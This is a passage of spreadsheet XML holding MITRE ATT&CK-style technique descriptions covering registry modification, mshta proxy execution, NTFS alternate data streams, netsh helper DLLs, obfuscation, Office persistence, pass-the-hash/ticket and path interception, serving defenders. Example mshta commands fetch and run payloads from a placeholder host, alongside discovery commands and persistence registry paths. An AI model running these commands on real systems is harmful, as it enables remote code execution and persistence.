      <t> directory. Examples of trusted binary names that can be given to malicious binares include "rsyncd" and "dbus-inotifier". </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>196</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>197</t>
    </r>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg.</t>
  </si>
  <si>
    <t>Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masqueradingthat may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.</t>
  </si>
  <si>
    <r>
      <t>Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>198199</t>
    </r>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <r>
      <t>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Reg</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> may be used for local or remote Registry modification.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>200</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).</t>
    </r>
  </si>
  <si>
    <r>
      <t>The Registry of a remote system may be modified to aid in execution of files as part of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Lateral Movement</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. It requires the remote Registry service to be running on the target system.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>201</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Often </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Valid Accounts</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>are required, along with access to the remote system's </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Windows Admin Shares</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for RPC communication.</t>
    </r>
  </si>
  <si>
    <t>T1170</t>
  </si>
  <si>
    <r>
      <t>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>.hta</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>202</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>203</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>204205206207208</t>
    </r>
  </si>
  <si>
    <r>
      <t>Files may be executed by mshta.exe through an inline script: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</t>
    </r>
  </si>
  <si>
    <r>
      <t>They may also be executed directly from URLs: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>mshta http[:]//webserver/payload[.]hta</t>
    </r>
  </si>
  <si>
    <t>Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.209</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.</t>
  </si>
  <si>
    <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
  </si>
  <si>
    <t>The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>T1188</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1079</t>
  </si>
  <si>
    <t>An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <r>
      <t>Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>210</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Within MFT entries are file attributes,</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>211</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>such as Extended Attributes (EA) and Data [known as Alternative Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>210212213214</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>215213</t>
    </r>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.216 The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.</t>
  </si>
  <si>
    <r>
      <t>Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>217</t>
    </r>
  </si>
  <si>
    <t>Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs.218</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1126</t>
  </si>
  <si>
    <r>
      <t>Windows shared drive and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Windows Admin Shares</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> connections can be removed when no longer needed. </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Net</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is an example utility that can be used to remove network share connections with the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>net use \\system\share /delete</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>219</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.</t>
    </r>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.</t>
  </si>
  <si>
    <r>
      <t>File sharing over a Windows network occurs over the SMB protocol.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>220221</t>
    </r>
  </si>
  <si>
    <t>Net can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share.</t>
  </si>
  <si>
    <r>
      <t>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Collection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and to identify potential systems of interest for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Lateral Movement</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>On Mac, locally mounted shares can be viewed with the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>df -aH</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command.</t>
    </r>
  </si>
  <si>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</si>
  <si>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LLMNR/NBT-NS Poisoning, can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.</t>
  </si>
  <si>
    <t>T1050</t>
  </si>
  <si>
    <r>
      <t>When operating systems boot up, they can start programs or applications called services that perform background system functions.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>222</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Masquerading</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Service Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>T1027</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</si>
  <si>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</si>
  <si>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r>
      <t>Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Initial Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or later to mitigate detection. Sometimes a user's action may be required to open and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Deobfuscate/Decode Files or Information</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>User Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>97</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries may also used compressed or archived scripts, such as Javascript.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>223</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>96</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries may also obfuscate commands executed from payloads or directly via a </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Command-Line Interface</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>224225226</t>
    </r>
  </si>
  <si>
    <r>
      <t>Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Invoke-PSImage</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>227</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> By the end of 2017, an adversary group used </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Invoke-PSImage</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>228</t>
    </r>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.</t>
  </si>
  <si>
    <t>Office Template Macros</t>
  </si>
  <si>
    <t>Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts.229</t>
  </si>
  <si>
    <r>
      <t>Office Visual Basic for Applications (VBA) macros</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>230</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>231232</t>
    </r>
  </si>
  <si>
    <r>
      <t>Word Normal.dotm location:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm</t>
    </r>
  </si>
  <si>
    <r>
      <t>Excel Personal.xlsb location:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</t>
    </r>
  </si>
  <si>
    <t>An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</t>
  </si>
  <si>
    <t>Office Test</t>
  </si>
  <si>
    <t>A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started233</t>
  </si>
  <si>
    <t>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</t>
  </si>
  <si>
    <t>Add-ins</t>
  </si>
  <si>
    <t>Office add-ins can be used to add functionality to Office programs.234</t>
  </si>
  <si>
    <t>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add-ins.235</t>
  </si>
  <si>
    <t>T1075</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Credential Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>236</t>
    </r>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.</t>
  </si>
  <si>
    <r>
      <t>In this technique, valid Kerberos tickets for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Valid Accounts</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> are captured by </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Credential Dumping</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>237238</t>
    </r>
  </si>
  <si>
    <t>Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).237</t>
  </si>
  <si>
    <t>Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.239</t>
  </si>
  <si>
    <t>T1174</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</si>
  <si>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t>
  </si>
  <si>
    <t>Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.</t>
  </si>
  <si>
    <t>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made.240</t>
  </si>
  <si>
    <t>T1201</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</si>
  <si>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</si>
  <si>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r>
      <t>Password policies can be set and discovered on Windows, Linux, and macOS systems.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>241242</t>
    </r>
  </si>
  <si>
    <t>net accounts</t>
  </si>
  <si>
    <t>net accounts /domain</t>
  </si>
  <si>
    <t>chage -l &lt;username&gt;</t>
  </si>
  <si>
    <t>cat /etc/pam.d/common-password</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>pwpolicy getaccountpolicies</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <r>
      <t>Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>243</t>
    </r>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Unquoted Paths</t>
  </si>
  <si>
    <r>
      <t>Service paths (stored in Windows Registry keys)</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>244</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\unsafe path with space\program.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> vs. </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>"C:\safe path with space\program.exe"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>245</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\program files\myapp.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, an adversary may create a program at </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\program.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> that will be run instead of the intended program.</t>
    </r>
  </si>
  <si>
    <t>PATH Environment Variable Misconfiguration</t>
  </si>
  <si>
    <r>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>%SystemRoot%\system32</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(e.g., </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\system32</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
